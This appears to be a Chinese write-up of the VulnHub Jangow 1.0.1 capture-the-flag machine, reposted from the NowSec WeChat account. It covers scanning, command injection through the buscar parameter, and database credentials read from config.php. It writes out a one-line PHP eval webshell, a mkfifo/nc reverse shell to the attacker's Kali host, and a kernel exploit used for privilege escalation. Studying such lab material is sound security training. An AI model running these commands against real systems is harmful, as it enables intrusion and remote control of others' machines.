VulnHub_Jangow: 1.0.1

admin 2022年4月19日01:42:22评论75 views字数 1318阅读4分23秒阅读模式

VulnHub_Jangow: 1.0.1

本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关

主机信息

kali:192.168.31.9BreakOut:192.168.31.227

信息收集

使用nmap探测目标主机端口2个端口,一个FTP,一个http
VulnHub_Jangow: 1.0.1
80端口网站打开是一个目录
VulnHub_Jangow: 1.0.1
打开site后是一个网站
VulnHub_Jangow: 1.0.1
简单查看后发现Buscar可以到跳转到其他页面,并且可接收参数
VulnHub_Jangow: 1.0.1

GETSHELL

经过测试这个接口可以执行命令
VulnHub_Jangow: 1.0.1
查看页面源码发现使用buscar接收参数后使用system函数进行执行命令
VulnHub_Jangow: 1.0.1
尝试反弹shell没有成功,然后查看用户目录下有一个user.txt
VulnHub_Jangow: 1.0.1
访问后得到第一个flag
VulnHub_Jangow: 1.0.1
在网站目录下查看wordpress目录,发现一个config.php
VulnHub_Jangow: 1.0.1
查看配置文件拿到数据库用户名和密码,通过代码判断应该是MySQL的数据库
VulnHub_Jangow: 1.0.1

$servername = "localhost";$database = "desafio02";$username = "desafio02";$password = "abygurl69";

使用获取到的用户名和密码尝试登录失败
VulnHub_Jangow: 1.0.1
然后尝试使用系统的用户和配置文件的密码组合发现登录成功,但是无法通过FTP获取更多信息
VulnHub_Jangow: 1.0.1
尝试使用命令执行写入shell

http://192.168.31.227/site/busque.php?buscar=echo '<?php @eval($_POST['x']); ?>' >> shell.php

VulnHub_Jangow: 1.0.1
检查看到shell写入成功
VulnHub_Jangow: 1.0.1
测试链接成功
VulnHub_Jangow: 1.0.1
VulnHub_Jangow: 1.0.1
查看系统版本和内核信息
VulnHub_Jangow: 1.0.1
查看.backup文件,发现存在用户名密码
VulnHub_Jangow: 1.0.1
反弹shell
使用蚁剑创建文件x.php,将以下内容写入文件,在kali上监听443端口,然后访问该文件

<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.31.239 443 >/tmp/f");?>

VulnHub_Jangow: 1.0.1
然后使用python获取一个ttyshell

python3 -c 'import pty;pty.spawn("/bin/bash")'

VulnHub_Jangow: 1.0.1
然后我们们用之前获取的用户名密码切换到jangow01用户
VulnHub_Jangow: 1.0.1

提权

通过上面获取的内核版本信息,使用searchspolit查询发现有可用的提权POC
VulnHub_Jangow: 1.0.1
然后将POC下载到本地
VulnHub_Jangow: 1.0.1
将POC进行编译
VulnHub_Jangow: 1.0.1
通过尝试最终在jangow01用户的家目录下上传了exp
VulnHub_Jangow: 1.0.1
在赋权执行时发现执行失败
VulnHub_Jangow: 1.0.1
然后尝试使用ssh进行本地连接
VulnHub_Jangow: 1.0.1
使用ssh连接后发现仍无法执行,最终确定因为编译机器kali为ARM架构,靶机为x86所以会导致执行失败,然后将POC上传到靶机进行编译后成功提权
VulnHub_Jangow: 1.0.1
查看最后一个Flag
VulnHub_Jangow: 1.0.1


加入我的星球


VulnHub_Jangow: 1.0.1


下方查看历史文章
VulnHub_Jangow: 1.0.1

VulnHub之DC-1

VulnHub之DC-2

VulnHub之DC-3

VulnHub之DC-4

VulnHub之MuzzyBox

【工具分享】AWVS 12 汉化破解版

通达OA任意上传&文件包含漏洞复现




扫描二维码

获取更多精彩

NowSec

VulnHub_Jangow: 1.0.1


原文始发于微信公众号(NowSec):VulnHub_Jangow: 1.0.1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月19日01:42:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   VulnHub_Jangow: 1.0.1https://cn-sec.com/archives/919123.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息